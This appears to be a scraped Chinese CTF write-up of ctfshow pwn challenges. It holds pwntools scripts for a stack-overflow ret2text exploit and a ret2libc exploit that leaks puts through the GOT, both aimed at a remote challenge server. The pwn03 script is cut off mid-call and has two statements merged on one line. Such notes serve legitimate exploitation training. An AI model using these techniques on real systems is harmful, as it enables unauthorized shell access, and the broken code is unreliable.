ctfshow刷题笔记(pwn篇)

编程入门 行业动态 更新时间:2024-10-20 09:23:55

ctfshow刷题<a href=https://www.elefans.com/category/jswz/34/1770047.html style=笔记(pwn篇)"/>

ctfshow刷题笔记(pwn篇)

一入pwn坑深似海,从此逆向是路人

目录

  • pwn02
  • pwn03
  • pwn04
  • pwn05(灌水题?)
  • pwn06(灌水题+1)
  • pwn07
  • pwn08(灌水?)
  • pwn10

pwn02

常规checksec一下

扔进IDA

点进pwnme()函数看看,明显的栈溢出

搜索字符串有/bin/sh

直接淦它

from pwn import*
io=remote('111.231.70.44',28054)
#io=process('./pwn02')
bin_sh=0x0804850F
payload=b'a'*13+p32(bin_sh)
io.sendline(payload)
io.interactive()

轻松秒杀

pwn03

依旧常规checksec,只开了NX

和上一题几乎一样,只是没给后门,得ret2libc了

需要远程打通,应该是libc版本不同本地打不通

from pwn import*
from LibcSearcher import*
elf=ELF('./pwn03')
#io=process('./pwn03')
io=remote('111.231.70.44',28021)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']
payload1=b'a'*13+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload1)
io.recvuntil('\n\n')
puts_add=u32(io.recv(4))
print(puts_add)libc=LibcSearcher('puts',puts_add)
libcbase=puts_add-libc.dump(

更多推荐

ctfshow刷题笔记(pwn篇)

本文发布于:2024-02-27 14:16:30,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1706865.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:笔记   ctfshow   pwn

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!